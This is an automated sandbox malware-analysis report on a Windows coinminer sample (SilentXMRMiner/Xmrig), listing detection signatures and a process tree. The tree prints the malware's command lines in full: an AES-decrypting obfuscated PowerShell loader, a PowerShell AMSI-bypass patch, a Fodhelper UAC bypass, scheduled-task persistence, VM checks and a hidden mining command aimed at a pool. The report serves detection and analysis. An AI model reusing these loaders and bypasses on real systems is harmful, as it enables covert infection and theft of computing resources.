
Windows Analysis Report
e7WMhx18XN.exe

Overview

General Information

Sample name: e7WMhx18XN.exe
(renamed because the original name is a hash value)
Original sample name: 38be83afea1e906c05e5b851253cbc6a.exe
Analysis ID: 1528504
MD5: 38be83afea1e906c05e5b851253cbc6a
SHA1: 85841044836479ac3c0b9fb7f1f28928621a4a99
SHA256: 425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3
Tags: 32, CoinMiner, exe

Detection

SilentXMRMiner, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
UAC bypass detected (Fodhelper)
Yara detected SilentXMRMiner
Yara detected Xmrig cryptocurrency miner
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Detected Stratum mining protocol
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Bypass UAC via Fodhelper.exe
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • svchost.exe (PID: 7712 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • e7WMhx18XN.exe (PID: 7728 cmdline: "C:\Users\user\Desktop\e7WMhx18XN.exe" MD5: 38BE83AFEA1E906C05E5B851253CBC6A)
    • cmd.exe (PID: 7380 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 1016 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • findstr.exe (PID: 6140 cmdline: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • cmd.exe (PID: 3888 cmdline: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 
'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 1784 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 2988 cmdline: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1472 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • powershell.exe (PID: 3228 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 6024 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WMIC.exe (PID: 4672 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
              • findstr.exe (PID: 5980 cmdline: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
              • cmd.exe (PID: 6112 cmdline: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 6052 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
                • schtasks.exe (PID: 7820 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                  • conhost.exe (PID: 4696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 6668 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                  • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 6808 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • powershell.exe (PID: 3800 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                  • conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 736 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • powershell.exe (PID: 2796 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                  • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 5320 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • powershell.exe (PID: 5584 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                  • conhost.exe (PID: 884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 7780 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • paint.exe (PID: 7520 cmdline: "C:\Users\user\AppData\Local\Temp\paint.exe" MD5: 9CA610EB2F785C8D2DDF2A50347039ED)
      • conhost.exe (PID: 7704 cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe" MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2968 cmdline: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7796 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • cmd.exe (PID: 1704 cmdline: "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • services64.exe (PID: 6152 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: 9CA610EB2F785C8D2DDF2A50347039ED)
            • conhost.exe (PID: 6140 cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe" MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WerFault.exe (PID: 7804 cmdline: C:\Windows\system32\WerFault.exe -u -p 6140 -s 1052 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • FodhelperBypassUAC.exe (PID: 7116 cmdline: "C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe" MD5: 9EB62648C9CC2F1EDD3E9CEF736F9C5C)
      • cmd.exe (PID: 6080 cmdline: /c C:\Windows\System32\fodhelper.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • fodhelper.exe (PID: 6184 cmdline: C:\Windows\System32\fodhelper.exe MD5: 85018BE1FD913656BC9FF541F017EACD)
          • cmd.exe (PID: 5900 cmdline: "cmd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Sgrmuserer.exe (PID: 7764 cmdline: C:\Windows\system32\Sgrmuserer.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 7940 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 2632 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7960 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • services64.exe (PID: 7424 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: 9CA610EB2F785C8D2DDF2A50347039ED)
    • conhost.exe (PID: 7536 cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe" MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sihost64.exe (PID: 7716 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" MD5: 61D09675A406E39F17F2EA03A3CB8CCC)
        • conhost.exe (PID: 3332 cmdline: "C:\Windows\System32\conhost.exe" "/sihost64" MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 1528 cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth MD5: 662F4F92FDE3557E86D110526BB578D5)
  • powershell.exe (PID: 3488 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](
103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$yNoIOiWMAQGoVU=$iKNksxDtTNKAc.GetMethod(''+'G'+'e'+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+'d'+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ldjQKaGUcclhcmhFUiK=fuLUlHVbHHgj @([String])([IntPtr]);$OGRkrpCaviqYlLkTxWpljP=fuLUlHVbHHgj 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JbgpKYFPFWJ=$iKNksxDtTNKAc.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'Mo'+'d'+''+[Char](117)+''+'l'+''+'e'+'H'+'a'+''+'n'+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+'n'+''+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+''+'.'+''+'d'+''+'l'+''+'l'+'')));$PQfPIIgelMLvUB=$yNoIOiWMAQGoVU.Invoke($Null,@([Object]$JbgpKYFPFWJ,[Object]('Lo'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$GDgGvFoXzgYhofixb=$yNoIOiWMAQGoVU.Invoke($Null,@([Object]$JbgpKYFPFWJ,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+'ec'+[Char](116)+'')));$DcSwIDH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PQfPIIgelMLvUB,$ldjQKaGUcclhcmhFUiK).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$rcGSxwaaaaKUimwsu=$yNoIOiWMAQGoVU.Invoke($Null,@([Object]$DcSwIDH,[Object](''+'A'+'m'+[Char](115)+'i'+'S'+'c'+'a'+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+'r'+'')));$QQMIPunPos=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GDgGvFoXzgYhofixb,$OGRkrpCaviqYlLkTxWpljP).Invoke($rcGSxwaaaaKUimwsu,[uint32]8,4,[ref]$QQMIPunPos);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rcGSxwaaaaKUimwsu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GDgGvFoXzgYhofixb,$OGRkrpCaviqYlLkTxWpljP).Invoke($rcGSxwaaaaKUimwsu,[uint32]8,0x20,[ref]$QQMIPunPos);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'TW'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'r'+[Char](98)+''+[Char](120)+'-'+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 7560 cmdline: C:\Windows\System32\dllhost.exe /Processid:{b07a7a50-b27b-4e63-a696-921ea5101b06} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
